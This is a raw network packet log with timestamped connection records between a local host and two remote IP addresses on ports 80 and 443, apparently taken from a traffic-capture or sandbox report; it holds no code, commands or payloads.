                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.706718922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.706729889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.706769943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.707709074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.707838058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.707865000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.707952976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.708856106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.708897114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.708976984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.709017038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.709990978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.710038900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852300882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852351904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852380037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852416992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852746010 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852796078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852822065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.852864027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.853867054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.853908062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.853964090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.854034901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.854954958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.854996920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.855053902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.855093956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.856061935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.856101990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.856157064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.856250048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.857266903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.857310057 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.857386112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.857426882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.858366013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.858383894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.858407974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.858428001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.859381914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.859426022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.859471083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.859513044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.860492945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.860532999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.860589027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.860629082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.861593962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.861624002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.861699104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.861738920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.862699986 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.862807989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.862821102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.862859964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.863806963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.863854885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.863878965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.863946915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.864912033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.864952087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.865040064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.865209103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.866014004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.866069078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.866106987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.866148949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.867202044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.867245913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.867330074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.867372990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.868248940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.868292093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.868453979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.868490934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.869339943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.869400024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.869442940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.869487047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.870445967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.870486021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.870557070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.870635986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.871562004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.871602058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.871654034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.871700048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.872667074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.872709036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.872751951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.872792006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.873795033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.873836040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.873909950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.873950005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.874916077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.874957085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.875000954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.875042915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.875992060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.876036882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.876080036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.876118898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.877103090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.877212048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.877216101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.877253056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.878204107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.878326893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.878371000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.879302979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.879345894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.879415989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.879457951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.880410910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.880456924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.880507946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.880552053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.881541967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.881582975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.881654024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.881710052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.882646084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.882688999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.882733107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.882776976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.883766890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.883810043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.883900881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.883940935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.884859085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.884965897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.884968996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.885015011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.885988951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.886030912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.886127949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.886167049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.887128115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.887167931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.887232065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.887306929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.888181925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.888225079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.888289928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.888330936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.889295101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.889341116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.889398098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.889439106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.890376091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.890414953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.890486956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.890532017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.891550064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.891593933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.891638041 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.891683102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.892630100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.892678022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.892728090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.892770052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.893819094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.893858910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.893887043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.893929958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.894836903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.894882917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.894958019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.895004988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.895935059 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.896013021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.896059036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.896106005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.897062063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.897110939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.897155046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.897314072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.898140907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.898186922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.898236036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.898279905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.899260998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.899327993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.899341106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.899385929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.900410891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.900460005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.900470018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.900510073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.901459932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.901508093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.901552916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.901592970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.902601957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.902656078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.902787924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.902829885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.903682947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.903749943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.903786898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.903836012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.904757023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.904800892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.904897928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.904937029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.905889034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.905965090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.906037092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.906116962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.906990051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.907042027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.907099962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.907141924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.908106089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.908152103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.908212900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.908261061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.909228086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.909269094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.909322023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.909419060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.910269976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.910310030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.986803055 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.986989021 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.989666939 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.989684105 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.990071058 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.035839081 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.037168980 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.044286013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.044409037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.044471025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.044817924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.044903994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.044956923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.045924902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.045974970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.046330929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.046466112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.046514034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.047430038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.047557116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.047606945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.048562050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.048681974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.048731089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.049654007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.049700022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.049793005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.049844027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.050760984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.050858974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.050908089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.051876068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.051922083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.052078962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.052994967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.053044081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.053087950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.054240942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.054256916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.054295063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.054307938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.055227995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.055275917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.055337906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.055385113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.056318045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.056435108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.056482077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.057420015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.057534933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.057588100 CET4986080192.168.2.431.41.244.11
